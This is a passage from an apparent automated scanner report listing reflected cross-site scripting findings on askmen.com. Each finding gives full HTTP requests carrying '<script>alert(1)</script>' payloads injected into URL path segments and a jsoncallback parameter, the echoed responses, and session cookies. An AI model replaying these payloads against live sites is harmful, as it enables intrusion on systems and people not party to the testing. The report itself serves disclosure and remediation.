<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>748fd2d4c5b/articles/getTodaysArticles/country:us.json/-->

1.127. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/js/am/min.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b742c--><script>alert(1)</script>8a0f8c6be90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesb742c--><script>alert(1)</script>8a0f8c6be90/js/am/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:06:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:06:58 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>8a0f8c6be90/js/am/min.php/-->

1.128. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/js/am/min.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 96a26--><script>alert(1)</script>80fa17cac57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js96a26--><script>alert(1)</script>80fa17cac57/am/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>80fa17cac57/am/min.php/-->

1.129. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/js/am/min.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload be4dc--><script>alert(1)</script>25fbaa2e8e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js/ambe4dc--><script>alert(1)</script>25fbaa2e8e2/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>25fbaa2e8e2/min.php/-->

1.130. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/js/am/min.php

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload f3612--><script>alert(1)</script>8774298ba9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js/am/min.phpf3612--><script>alert(1)</script>8774298ba9?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38687
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>8774298ba9/-->

1.131. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 60e57--><script>alert(1)</script>03504e51112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes60e57--><script>alert(1)</script>03504e51112/views/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>03504e51112/views/helpers/cache.php/-->

1.132. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bf1fd--><script>alert(1)</script>aef62cdb3b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/viewsbf1fd--><script>alert(1)</script>aef62cdb3b1/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>aef62cdb3b1/helpers/cache.php/-->

1.133. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload db6bc--><script>alert(1)</script>acf16507727 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/views/helpersdb6bc--><script>alert(1)</script>acf16507727/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>acf16507727/cache.php/-->

1.134. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 449be--><script>alert(1)</script>22759164fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/views/helpers/cache.php449be--><script>alert(1)</script>22759164fa?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38697
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>22759164fa/-->

1.135. http://www.askmen.com/includes/views/helpers/cache.php [jsoncallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/includes/views/helpers/cache.php

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload cd866<script>alert(1)</script>4845e0f9b68 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/views/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211cd866<script>alert(1)</script>4845e0f9b68&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Content-Length: 145
Content-Type: application/json; charset=utf-8
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
ServerHost: askmen-prod-web-app-05
AMCache: Hit
Expires: Tue, 04 Oct 2011 20:19:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:29 GMT
Connection: close

jQuery16109072330188937485_1317758932211cd866<script>alert(1)</script>4845e0f9b68({"4":43,"5":29,"0":14,"2":14,"1":0,"3":0,"total_reactions":7});

1.136. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7ba26--><script>alert(1)</script>e1deec8577f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_107ba26--><script>alert(1)</script>e1deec8577f/cars/fastest-cars-in-the-world.html HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38707
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found
...[SNIP]...
<script>alert(1)</script>e1deec8577f/cars/fastest-cars-in-the-world.html-->

1.137. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askmen.com
Path:	/top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d514b--><script>alert(1)</script>547716ebfec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

